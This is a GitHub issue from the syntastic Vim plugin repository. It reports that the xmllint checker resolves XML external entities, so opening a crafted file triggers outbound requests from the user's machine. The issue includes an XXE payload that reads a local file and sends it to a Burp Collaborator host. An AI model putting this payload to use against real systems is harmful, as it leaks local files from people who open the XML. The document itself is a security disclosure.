Skip to content
This repository was archived by the owner on Sep 20, 2023. It is now read-only.
This repository was archived by the owner on Sep 20, 2023. It is now read-only.

Potential XXE  #2274

@sogewasp

Description

@sogewasp

Hello,
yesterday I was pentesting a website and I was happy to see some XXE popping out in my Burp.
Then I realized that the requests weren't coming from the website but from my own machine!
So I investigated and found out that syntastic was making the requests while parsing my XML containing the XXE.

Here's one of the payloads I tested:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [
 <!ENTITY % data SYSTEM "file:///tmp/lol">
 <!ENTITY % req2 SYSTEM 'http://mukoxxxxxxxxxxx5z.burpcollaborator.net/?%data;'>
 %req2;
]>

And here's the results on Burp:
Syntastic_Burp_HTTP

The requests are made each time syntastic parses the file, so also at the very moment you open it !

I found that the vulnerable part is in the file syntastic/syntax_checkers/xml/xmllint.vim but I didn't yet get the logic and why it's making the requests (maybe it's a feature !), so I decided to make an issue to discuss if it's necessary to patch or it's a normal behavior.

I am not yet able to exfiltrate data but I'm working on it, and maybe there's other security ninjas with fancy tricks capable of doing it.

Other useful information:

VIM - Vi IMproved 8.1 (2018 May 18, compiled Jun 15 2019 16:41:15)
(Debian Stretch version)
-----
Syntastic version: 3.9.0-41 (Vim 801, Linux, GUI)
Info for filetype:
Global mode: active
Filetype  is active
The current file will be checked automatically
Available checkers: -
Currently enabled checkers: -

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions